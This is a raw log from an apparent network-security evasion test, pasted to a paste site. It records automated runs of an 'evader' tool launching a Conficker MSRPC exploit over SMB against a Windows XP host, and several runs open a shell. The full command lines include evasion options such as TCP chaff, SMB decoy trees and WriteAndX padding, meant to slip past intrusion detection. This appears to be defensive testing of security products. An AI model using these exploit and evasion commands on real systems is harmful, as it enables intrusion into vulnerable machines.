- - Before normal SMB writes, 7 SMB trees are opened and 4 writes are performed to them. The write payload is 7 random bytes.
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.116:23791 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 10088 runs averaging 1.87 runs / second ; progress: 5399/43200.................
- 10105 runs averaging 1.87 runs / second ; progress: 5404/43200...........
- 10116 runs averaging 1.87 runs / second ; progress: 5409/43200........
- 10124 runs averaging 1.87 runs / second ; progress: 5414/43200..2015-06-08 00:49:47 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37811 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=rAdEwDS3pbY --evasion=[msrpc_bind,end]smb_decoytrees,"4","2","8","random_msrpcreq" --evasion=[netbios_connect,msrpc_req]tcp_chaff,"25%","nullflag|outofwindow|shorthdr","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed rAdEwDS3pba
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 25% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * Duplicate packet has random alpha bytes as payload
- The following evasions are applied from stage msrpc_bind to end:
- - Before normal SMB writes, 4 SMB trees are opened and 2 writes are performed to them. The write payload is 8 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.111:37811 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .......
- 44283 runs averaging 1.73 runs / second ; progress: 25593/432002015-06-08 06:26:03 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33396 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=SlCGLlc3zX8 --evasion=[smb_openpipe,msrpc_req]smb_writeandxpad,"3","random_alphanum" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"25%","7","random" --verifydelay=1000 --payload=shell
- Info: Using random seed SlCGLlc3zX9
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 3 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.114:33396 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....
- 4550874 runs averaging 12.76 runs / second ; progress: 43175/43200.............................................................................................................................................................
- 551031 runs averaging 12.76 runs / second ; progress: 43181/43200...................................................................................................................................
- 551162 runs averaging 12.76 runs / second ; progress: 43187/43200...................................................................................................................................
- 551293 runs averaging 12.76 runs / second ; progress: 43194/43200..................................................................................................................................
- 2015-06-08 11:19:31 INFO Done.
- Printing test result
- 2015-06-08 11:19:32 INFO Mongbat test report
- Using /root/evader/evader version 2013.2.586 ( x86, o, evc4 )
- Started : 2015-06-07 23:19:29 +0300
- Finished: 2015-06-08 11:19:31 +0300
- Log
- close
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement